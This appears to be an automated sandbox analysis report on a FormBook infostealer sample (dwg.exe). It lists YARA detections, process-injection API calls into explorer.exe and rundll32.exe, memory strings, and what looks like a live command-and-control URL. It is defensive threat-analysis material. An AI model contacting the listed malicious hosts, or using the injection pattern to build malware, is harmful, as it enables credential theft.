      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: rundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpString found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
      Source: rundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpString found in binary or memory: https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B NtSetInformationThread,NtWriteVirtualMemory,0_2_0216329B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216637E NtResumeThread,0_2_0216637E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216180C NtWriteVirtualMemory,0_2_0216180C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216056A EnumWindows,NtSetInformationThread,0_2_0216056A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165DB1 NtProtectVirtualMemory,0_2_02165DB1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02160602 NtSetInformationThread,0_2_02160602
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165E08 NtResumeThread,0_2_02165E08
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162626 NtWriteVirtualMemory,0_2_02162626
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162698 NtWriteVirtualMemory,0_2_02162698
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216068A NtSetInformationThread,0_2_0216068A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165F0B NtResumeThread,0_2_02165F0B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216272A NtWriteVirtualMemory,0_2_0216272A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216279A NtWriteVirtualMemory,0_2_0216279A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166384 NtResumeThread,0_2_02166384
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021663CA NtResumeThread,0_2_021663CA
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216640E NtResumeThread,0_2_0216640E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162831 NtWriteVirtualMemory,0_2_02162831
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165C3B NtResumeThread,0_2_02165C3B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216245B NtWriteVirtualMemory,0_2_0216245B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166466 NtResumeThread,0_2_02166466
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166487 NtResumeThread,0_2_02166487
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216288E NtWriteVirtualMemory,0_2_0216288E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021624AE NtWriteVirtualMemory,0_2_021624AE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021664C6 NtResumeThread,0_2_021664C6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021624F2 NtWriteVirtualMemory,0_2_021624F2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162916 NtWriteVirtualMemory,0_2_02162916
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166533 NtResumeThread,0_2_02166533
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02163522 NtWriteVirtualMemory,0_2_02163522
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162557 NtWriteVirtualMemory,0_2_02162557
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166558 NtResumeThread,0_2_02166558
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02160540 NtSetInformationThread,0_2_02160540
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166596 NtResumeThread,0_2_02166596
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162986 NtWriteVirtualMemory,0_2_02162986
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021605B6 NtSetInformationThread,0_2_021605B6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021625B2 NtWriteVirtualMemory,0_2_021625B2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165DF8 NtResumeThread,0_2_02165DF8
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E289660
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E2896E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E289710
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E2897A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E289780
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289FE0 NtCreateMutant,LdrInitializeThunk,1_2_1E289FE0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289540 NtReadFile,LdrInitializeThunk,1_2_1E289540
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2895D0 NtClose,LdrInitializeThunk,1_2_1E2895D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A20 NtResumeThread,LdrInitializeThunk,1_2_1E289A20
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E289A00
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A50 NtCreateFile,LdrInitializeThunk,1_2_1E289A50
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E289860
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289840 NtDelayExecution,LdrInitializeThunk,1_2_1E289840
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E2898F0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E289910
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2899A0 NtCreateSection,LdrInitializeThunk,1_2_1E2899A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289610 NtEnumerateValueKey,1_2_1E289610
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289670 NtQueryInformationProcess,1_2_1E289670
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289650 NtQueryValueKey,1_2_1E289650
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2896D0 NtCreateKey,1_2_1E2896D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289730 NtQueryVirtualMemory,1_2_1E289730
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A710 NtOpenProcessToken,1_2_1E28A710
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289760 NtOpenProcess,1_2_1E289760
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A770 NtOpenThread,1_2_1E28A770
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289770 NtSetInformationFile,1_2_1E289770
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289520 NtWaitForSingleObject,1_2_1E289520
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28AD30 NtSetContextThread,1_2_1E28AD30
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289560 NtWriteFile,1_2_1E289560
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2895F0 NtQueryInformationFile,1_2_1E2895F0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A10 NtQuerySection,1_2_1E289A10
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A80 NtOpenDirectoryObject,1_2_1E289A80
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289B00 NtSetValueKey,1_2_1E289B00
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A3B0 NtGetContextThread,1_2_1E28A3B0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289820 NtEnumerateKey,1_2_1E289820
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28B040 NtSuspendThread,1_2_1E28B040
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2898A0 NtWriteVirtualMemory,1_2_1E2898A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289950 NtQueueApcThread,1_2_1E289950
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2899D0 NtCreateProcessEx,1_2_1E2899D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565D76 NtProtectVirtualMemory,NtSetInformationThread,1_2_00565D76
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056637E NtSetInformationThread,1_2_0056637E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566466 NtSetInformationThread,1_2_00566466
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056640E NtSetInformationThread,1_2_0056640E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005664C6 NtSetInformationThread,1_2_005664C6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566487 NtSetInformationThread,1_2_00566487
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566558 NtSetInformationThread,1_2_00566558
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566533 NtSetInformationThread,1_2_00566533
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DCF NtSetInformationThread,1_2_00565DCF
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DE2 NtSetInformationThread,1_2_00565DE2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566596 NtSetInformationThread,1_2_00566596
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DB1 NtProtectVirtualMemory,1_2_00565DB1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565E08 NtSetInformationThread,1_2_00565E08
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005666EB NtSetInformationThread,1_2_005666EB
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565F0B NtSetInformationThread,1_2_00565F0B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005663CA NtSetInformationThread,1_2_005663CA
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566384 NtSetInformationThread,1_2_00566384
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459540 NtReadFile,LdrInitializeThunk,13_2_04459540
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044595D0 NtClose,LdrInitializeThunk,13_2_044595D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459650 NtQueryValueKey,LdrInitializeThunk,13_2_04459650
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04459660
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044596D0 NtCreateKey,LdrInitializeThunk,13_2_044596D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044596E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_044596E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459710 NtQueryInformationToken,LdrInitializeThunk,13_2_04459710
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459FE0 NtCreateMutant,LdrInitializeThunk,13_2_04459FE0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459780 NtMapViewOfSection,LdrInitializeThunk,13_2_04459780
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459840 NtDelayExecution,LdrInitializeThunk,13_2_04459840
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459860 NtQuerySystemInformation,LdrInitializeThunk,13_2_04459860
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_04459910
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044599A0 NtCreateSection,LdrInitializeThunk,13_2_044599A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A50 NtCreateFile,LdrInitializeThunk,13_2_04459A50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459560 NtWriteFile,13_2_04459560
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459520 NtWaitForSingleObject,13_2_04459520
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445AD30 NtSetContextThread,13_2_0445AD30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044595F0 NtQueryInformationFile,13_2_044595F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459670 NtQueryInformationProcess,13_2_04459670
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459610 NtEnumerateValueKey,13_2_04459610
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459760 NtOpenProcess,13_2_04459760
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A770 NtOpenThread,13_2_0445A770
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459770 NtSetInformationFile,13_2_04459770
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A710 NtOpenProcessToken,13_2_0445A710
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459730 NtQueryVirtualMemory,13_2_04459730
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044597A0 NtUnmapViewOfSection,13_2_044597A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445B040 NtSuspendThread,13_2_0445B040
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459820 NtEnumerateKey,13_2_04459820
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044598F0 NtReadVirtualMemory,13_2_044598F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044598A0 NtWriteVirtualMemory,13_2_044598A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459950 NtQueueApcThread,13_2_04459950
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044599D0 NtCreateProcessEx,13_2_044599D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A00 NtProtectVirtualMemory,13_2_04459A00
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A10 NtQuerySection,13_2_04459A10
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A20 NtResumeThread,13_2_04459A20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A80 NtOpenDirectoryObject,13_2_04459A80
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459B00 NtSetValueKey,13_2_04459B00
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A3B0 NtGetContextThread,13_2_0445A3B0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A81E0 NtCreateFile,13_2_001A81E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8290 NtReadFile,13_2_001A8290
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8310 NtClose,13_2_001A8310
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A83C0 NtAllocateVirtualMemory,13_2_001A83C0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A819A NtCreateFile,13_2_001A819A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A81DC NtCreateFile,13_2_001A81DC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8235 NtCreateFile,13_2_001A8235
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A828A NtReadFile,13_2_001A828A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A830B NtClose,13_2_001A830B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_004013480_2_00401348
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E266E301_2_1E266E30
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30D6161_2_1E30D616
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312EF71_2_1E312EF7
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311FF11_2_1E311FF1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31DFCE1_2_1E31DFCE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25841F1_2_1E25841F
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30D4661_2_1E30D466
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E240D201_2_1E240D20
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312D071_2_1E312D07
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311D551_2_1E311D55
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2725811_2_1E272581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25D5E01_2_1E25D5E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3125DD1_2_1E3125DD
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3122AE1_2_1E3122AE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312B281_2_1E312B28
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27EBB01_2_1E27EBB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30DBD21_2_1E30DBD2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3003DA1_2_1E3003DA
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31E8241_2_1E31E824
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3010021_2_1E301002
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A01_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3120A81_2_1E3120A8
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B0901_2_1E25B090
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3128EC1_2_1E3128EC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2641201_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24F9001_2_1E24F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DD46613_2_044DD466
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442841F13_2_0442841F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1D5513_2_044E1D55
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2D0713_2_044E2D07
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04410D2013_2_04410D20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E25DD13_2_044E25DD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E013_2_0442D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444258113_2_04442581
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DD61613_2_044DD616
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04436E3013_2_04436E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2EF713_2_044E2EF7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044EDFCE13_2_044EDFCE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1FF113_2_044E1FF1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D100213_2_044D1002
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044EE82413_2_044EE824
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A83013_2_0443A830
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E28EC13_2_044E28EC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B09013_2_0442B090
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A013_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E20A813_2_044E20A8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441F90013_2_0441F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443412013_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFA2B13_2_044CFA2B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E22AE13_2_044E22AE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AB4013_2_0443AB40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2B2813_2_044E2B28
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D03DA13_2_044D03DA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DDBD213_2_044DDBD2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444EBB013_2_0444EBB0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00198C7013_2_00198C70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00198C6C13_2_00198C6C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192D9013_2_00192D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192D8813_2_00192D88
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AC73F13_2_001AC73F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AC7B813_2_001AC7B8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192FB013_2_00192FB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: String function: 1E24B150 appears 45 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0441B150 appears 54 times
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exe, 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exe, 00000000.00000002.247561257.0000000002130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs dwg.exe
      Source: dwg.exe, 00000000.00000002.248010737.0000000002960000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoveddrif.exeFE2XANTERIADGRIZZ vs dwg.exe
      Source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs dwg.exe
      Source: dwg.exe, 00000001.00000000.245755926.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exe, 00000001.00000002.312855043.000000001E4CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs dwg.exe
      Source: dwg.exe, 00000001.00000002.312005314.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs dwg.exe
      Source: dwg.exeBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
